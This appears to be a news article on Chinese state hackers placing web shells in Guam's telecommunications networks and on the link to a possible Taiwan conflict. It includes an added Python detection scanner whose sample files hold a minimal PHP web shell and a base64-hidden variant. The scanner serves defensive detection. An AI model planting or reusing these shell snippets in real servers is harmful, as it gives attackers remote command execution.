
Chinese Hackers Infiltrated Guam's Telecommunications Systems. Is Taiwan the Real Target?

The Great Hall of the People in Beijing. Telecommunications networks are key targets for hackers, and Guam's systems are particularly important to China. Thibault Camus/Associated Press
Around the time that the F.B.I. was examining the equipment recovered from the Chinese spy balloon shot down off the South Carolina coast in February, American intelligence agencies and Microsoft detected what they feared was a more worrisome intruder: mysterious computer code appearing in telecommunications systems in Guam and elsewhere in the United States.
The code, which Microsoft said was installed by a Chinese government hacking group, raised alarms because Guam, with its Pacific ports and vast American air base, would be a centerpiece of any American military response to an invasion or blockade of Taiwan. The operation was conducted with great stealth, sometimes flowing through home routers and other common internet-connected consumer devices, to make the intrusion harder to track.
The code is called a “web shell,” in this case a malicious script that enables remote access to a server. Home routers are particularly vulnerable, especially older models that have not had updated software and protections.
Unlike the balloon that fascinated Americans as it performed pirouettes over sensitive nuclear sites, the computer code could not be shot down on live television. So instead, Microsoft on Wednesday published details of the code that would make it possible for corporate users, manufacturers and others to detect and remove it. In a coordinated release, the National Security Agency — along with other domestic agencies and counterparts in Australia, Britain, New Zealand and Canada — published a 24-page advisory that referred to Microsoft’s finding and offered broader warnings about a “recently discovered cluster of activity” from China.
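The web shell described above is, at its simplest, a script in a public web root that hands a request parameter to a command interpreter; the detection details Microsoft published were meant to let operators find and remove such files. As an added example that is not part of the original article and is not the group's actual code, the Python scanner below checks constructed sample files for that pattern, including a copy hidden behind a base64 literal. The file names, file contents and rule set are assumptions made for illustration.

```python
"""Heuristic scan of web-root sources for web-shell indicators.

Added example. The sample files are constructed for illustration; they are
not the code the article describes, and the rules are heuristics, not a
complete signature set.
"""
import base64
import re

# A request parameter flowing into a command-execution function is the core
# of a minimal web shell; eval over a decoded blob is the usual way to hide it.
REQUEST_SOURCE = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
EXEC_SINKS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("

RULES = {
    "exec_from_request": re.compile(EXEC_SINKS + r"[^;]*" + REQUEST_SOURCE, re.I),
    "eval_base64": re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.I),
    "dynamic_function": re.compile(
        r"\b(?:create_function|assert)\s*\(\s*" + REQUEST_SOURCE, re.I
    ),
}

# Inline base64 literals handed to base64_decode(); decoded and re-scanned.
B64_BLOB = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]")


def decode_blobs(text):
    """Return the decoded text of each inline base64 literal in `text`.

    Blobs that are not valid base64 are skipped rather than raising."""
    decoded = []
    for blob in B64_BLOB.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def scan_source(text, depth=0):
    """Return the sorted rule names that fire on `text`.

    Rules that fire inside a decoded base64 payload are reported with a
    'decoded:' prefix. Only one level of unwrapping is performed."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    if depth == 0:
        for inner in decode_blobs(text):
            hits |= {"decoded:" + h for h in scan_source(inner, depth + 1)}
    return sorted(hits)


def scan_files(files):
    """`files` maps path -> source text. Returns {path: [rule names]} for every
    file with at least one hit; clean files are omitted."""
    report = {}
    for path, text in files.items():
        hits = scan_source(text)
        if hits:
            report[path] = hits
    return report


# Constructed sample web root (assumed names and contents).
SAMPLE_FILES = {
    # Benign page: reads a parameter but never passes it to a shell.
    "index.php": "<?php $page = $_GET['page'] ?? 'home'; echo htmlspecialchars($page); ?>",
    # Minimal web shell: executes whatever the request parameter contains.
    "images/.cache.php": "<?php @system($_REQUEST['c']); ?>",
    # Obfuscated variant: the same shell, hidden behind a base64 literal.
    "uploads/thumb.php": "<?php eval(base64_decode('"
    + base64.b64encode(b"passthru($_POST['x']);").decode()
    + "')); ?>",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(hits)}")
```

Source scanning alone is a starting point, not a verdict: benign administrative scripts can trip these rules, and a shell that reaches the server as a legitimate-looking upload or lives on a router's firmware will not be in a web root at all. In practice this check is paired with file-modification timestamps, web server logs showing POST requests to paths that should never receive them, and process lineage (a web server worker spawning a shell).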
Microsoft called the hacking group “Volt Typhoon” and said that it was part of a state-sponsored Chinese effort aimed at not only critical infrastructure such as communications, electric and gas utilities, but also maritime operations and transportation. The intrusions appeared, for now, to be an espionage campaign. But the Chinese could use the code, which is designed to pierce firewalls, to enable destructive attacks, if they choose.
So far, Microsoft says, there is no evidence that the Chinese group has used the access for any offensive attacks. Unlike Russian groups, the Chinese intelligence and military hackers usually prioritize espionage.
In interviews, administration officials said they believed the code was part of a vast Chinese intelligence collection effort that spans cyberspace, outer space and, as Americans discovered with the balloon incident, the lower atmosphere.
The Biden administration has declined to discuss what the F.B.I. found as it examined the equipment recovered from the balloon. But the craft — better described as a huge aerial vehicle — apparently included specialized radars and communications interception devices that the F.B.I. has been examining since the balloon was shot down.
It is unclear whether the government’s silence about its finding from the balloon is motivated by a desire to keep the Chinese government from knowing what the United States has learned or to get past the diplomatic breach that followed the incursion.
On Sunday, speaking at a news conference in Hiroshima, Japan, President Biden referred to how the balloon incident had paralyzed the already frosty exchanges between Washington and Beijing.
“And then this silly balloon that was carrying two freight cars’ worth of spying equipment was flying over the United States,” he told reporters, “and it got shot down, and everything changed in terms of talking to one another.”
He predicted that relations would “begin to thaw very shortly.”
The focus on Guam has particularly caught the attention of officials assessing China's capability, and its willingness, to attack or blockade Taiwan. Chang W. Lee/The New York Times
China has never acknowledged hacking into American networks, even in the biggest example of all: the theft of security clearance files of roughly 22 million Americans — including six million sets of fingerprints — from the Office of Personnel Management during the Obama administration. That exfiltration of data took the better part of a year, and resulted in an agreement between President Barack Obama and President Xi Jinping that resulted in a brief decline in malicious Chinese cyberactivity.
On Wednesday, China sent a warning to its companies to be alert to American hacking. And there has been plenty of that, too: In documents released by Edward Snowden, the former N.S.A. contractor, there was evidence of American efforts to hack into the systems of Huawei, the Chinese telecommunications giant, and military and leadership targets.
Telecommunications networks are key targets for hackers, and the system in Guam is particularly important to China because military communications often piggyback on commercial networks.
Tom Burt, the executive who oversees Microsoft’s threat intelligence unit, said in an interview that the company’s analysts — many of them veterans of the National Security Agency and other intelligence agencies — had found the code “while investigating intrusion activity impacting a U.S. port.” As they traced back the intrusion, they found other networks that were hit, “including some in the telecommunications sector in Guam.”
Anne Neuberger, the deputy national security adviser for cyber and emerging technology, said that covert efforts “like the activity exposed today are part of what’s driving our focus on the security of telecom networks and the urgency to use trusted vendors” whose equipment has met established cybersecurity standards.
Ms. Neuberger has been spearheading an effort across the federal government to enforce new cybersecurity standards for critical infrastructure. Officials were taken by surprise by the extent of the vulnerabilities in such infrastructure when a Russian ransomware attack on Colonial Pipeline in 2021 interrupted gasoline, diesel and airplane fuel flow on the East Coast. In the wake of the attack, the Biden administration used little-known powers of the Transportation Security Administration — which regulates pipelines — to force private-sector utilities to follow a series of cybersecurity mandates.
Now Ms. Neuberger is driving what she called a “relentless focus on improving the cybersecurity of our pipelines, rail systems, water systems and other critical services,” including the mandates on cybersecurity practices for these sectors and closer collaboration with companies with “unique visibility” into threats to such infrastructure.
Those firms include Microsoft, Google, Amazon, and many telecommunications firms that can see activity on domestic networks. Intelligence agencies, including the N.S.A., are forbidden by law from operating inside the United States. But the N.S.A. is permitted to publish warnings, as it did on Wednesday, alongside the F.B.I. and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency.
The agency’s report is part of a relatively new U.S. government move to publish such data quickly in hopes of burning operations like the one mounted by the Chinese government. In years past, the United States usually withheld such information — sometimes classifying it — and shared it with only a select few companies or organizations. But that almost always assured that the hackers could stay well ahead of the government.
In this case, it was the focus on Guam that particularly seized the attention of officials who are assessing China’s capabilities — and its willingness — to attack or choke off Taiwan. Mr. Xi has ordered the People’s Liberation Army to be capable of taking the island by 2027. But the C.I.A. director, William J. Burns, has noted to Congress that the order “does not mean he has decided to conduct an invasion.”
In the dozens of U.S. tabletop exercises conducted in recent years to map out what such an attack might look like, one of China’s first anticipated moves would be to cut off American communications and slow the United States’ ability to respond. So the exercises envision attacks on satellite and ground communications, especially around American installations where military assets would be mobilized.
None is bigger than Guam, where Andersen Air Force Base would be the launching point for many of the Air Force missions to help defend the island, and a Navy port is crucial for American submarines.

David E. Sanger is a White House and national security correspondent. In 38 years at The Times, he has been part of three teams that won Pulitzer Prizes, most recently in 2017 for international reporting. His most recent book is The Perfect Weapon: War, Sabotage and Fear in the Cyber Age. Follow him on Twitter and Facebook.

Translation: 纽约时报中文网 (The New York Times Chinese edition)

